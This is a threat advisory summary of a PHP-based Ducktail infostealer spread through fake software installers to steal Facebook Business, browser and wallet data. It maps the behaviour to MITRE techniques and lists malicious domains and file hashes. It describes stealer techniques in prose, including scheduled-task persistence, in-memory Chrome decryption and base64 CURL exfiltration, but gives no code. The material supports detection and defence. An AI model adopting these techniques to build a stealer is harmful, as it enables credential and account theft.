A campaign featuring a PHP-based Ducktail Infostealer is being distributed as fake installers for popular software, games, and other content. The actors, a Vietnamese threat group, have focused on Facebook Business accounts and have evolved their delivery and techniques since 2021.
Keypoints
- The Ducktail Infostealer variant discussed is the PHP version, disguised as cracked/free installers hosted on file-sharing platforms.
- Originally targeted Facebook Business accounts to manipulate pages and harvest financial information; the group shifted from targeting specific high-level users to broader audiences.
- Earlier Ducktail relied on .NET Core and Telegram for C2; the August 2022 campaign introduced a PHP-based stealer with new TTPs.
- The dropper uses a fake installer, creates temporary files, re-launches with /Silent, and drops components at a chosen location; persistence is achieved via scheduled tasks that run the payload daily.
- Data theft includes browser information, cookies, Chrome local state, wallet.dat, and other data; the malware decrypts Chrome data in memory and transmits via a PHP/CURL-based C2 channel using base64 encoding.
- Targeted data includes Facebook Graph API, Ads Manager, and Facebook Business accounts; the C2 supplies a list of folders/URLs in JSON for further data collection.
- Indicators of Compromise include numerous domains, MD5, SHA-256, and SHA-1 hashes linked to the campaign (see below).
MITRE Techniques
- [T1059] Command and Scripting Interpreter – The PHP script performs actions such as fetching browser information and sending data to the C2. Bracket quote: “…The PHP script creates PHP associative arrays to prepare for data transmission to the C&C server. The CURL command is used for sending and receiving files over HTTP…”
- [T1053] Scheduled Task – Persistence is achieved by scheduling tasks to execute the malicious payload daily and at regular intervals. Bracket quote: “…scheduling tasks to execute the malicious payload, named “libbridged.exe,” daily and at regular intervals.”…
- [T1027] Obfuscated/Compressed Files and Information – The stealer code is decrypted at runtime in memory. Bracket quote: “…decrypting the stealer code at runtime in memory.”
- [T1132] Data Encoding – Stolen data is encoded to base64 before exfiltration. Bracket quote: “…encodes stolen information to base64, and saves it to log files.”
- [T1071.001] Web Protocols – Data is exfiltrated via HTTP using CURL to communicate with the C2 server. Bracket quote: “…The CURL command is used for sending and receiving files over HTTP, and specific switches are employed during communication.”
- [T1555.003] Credentials in Web Browsers – The malware retrieves and decrypts data from Chrome, including cookies and local state, as part of data collection. Bracket quote: “…decrypts sensitive data protected by Chrome’s local data encryption, encodes stolen information to base64…”
- [T1033] Account Discovery – Targeting Facebook Business accounts and gathering account details aligns with enumerating user accounts/assets. Bracket quote: “…targets Facebook Business accounts, including Facebook API graph, Facebook Ads Manager, and Facebook Business accounts, to gather account details…”
Indicators of Compromise
- [Domain Name] – Example domains observed include slmg.online, roberthalfchro.online, and 13 more domains (domain indicators listed in the article).
- [MD5] – Example hashes: df4588057abcf11a666891f4edbac6cb, 7956af4e60ce3cf7b36ca520ab0ea201, and 2 more hashes
- [SHA-256] – Example hashes: f3015c46ff2103431b383514591e1c1bf348119475c6a183066d3b8f6a896bca, 9f8e5f98f6ed3f63fb9266fde5f36b3bff242e8ebedbe6130558c65fde8addf7, and 2 more hashes
- [SHA-1] – Example hashes: 09b88e2314ae1ebab6db6d4e40d68a912a025bee, 44de6f5007090c84ff00f0b226b3f159dfbb6864, and 2 more hashes
Read more: https://www.rewterz.com/threat-advisory/an-emerging-ducktail-infostealer-active-iocs-9